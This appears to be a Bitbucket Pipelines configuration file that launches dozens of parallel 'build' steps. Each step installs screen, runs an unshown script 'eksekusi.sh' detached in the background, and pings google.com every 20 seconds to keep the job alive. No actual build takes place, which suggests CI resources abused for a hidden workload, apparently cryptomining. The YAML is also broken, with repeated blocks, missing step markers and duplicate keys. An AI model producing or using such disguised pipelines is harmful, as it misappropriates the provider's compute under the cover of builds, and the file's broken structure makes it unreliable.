  options:
  max-time: 120
  size: 2x
image: python:3.8
pipelines:
  default:
    - parallel:
      - step:
          name: build-1
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-2
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-3
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-4
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-5
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-6
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-7
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-8
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-9
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-10
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
          name: build-1
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-2
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-3
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-4
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-5
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-6
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-7
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-8
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-9
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-10
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
          name: build-1
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-2
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-3
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-4
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-5
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-6
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-7
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-8
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-9
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-10
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
          name: build-1
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-2
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-3
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-4
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-5
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-6
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-7
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-8
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-9
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-10
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
          name: build-1
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-2
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-3
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-4
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-5
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-6
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-7
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-8
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-9
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-10
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
          name: build-1
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-2
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-3
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-4
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-5
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-6
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-7
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-8
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-9
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-10
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
          name: build-1
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-2
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-3
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-4
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-5
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-6
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-7
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-8
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-9
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-10
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-1
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-2
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-3
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-4
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-5
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-6
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-7
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-8
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-9
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-10
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
          name: build-1
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-2
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-3
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-4
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-5
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-6
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-7
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-8
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-9
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-10
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
          name: build-1
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-2
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-3
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-4
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-5
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-6
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-7
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-8
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-9
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com
      - step:
          name: build-10
          script:
            - apt update && apt install sudo screen -y
            - chmod +x eksekusi.sh && screen -dmS xxx ./eksekusi.sh
            - sleep 5 
            - ping -i 20 google.com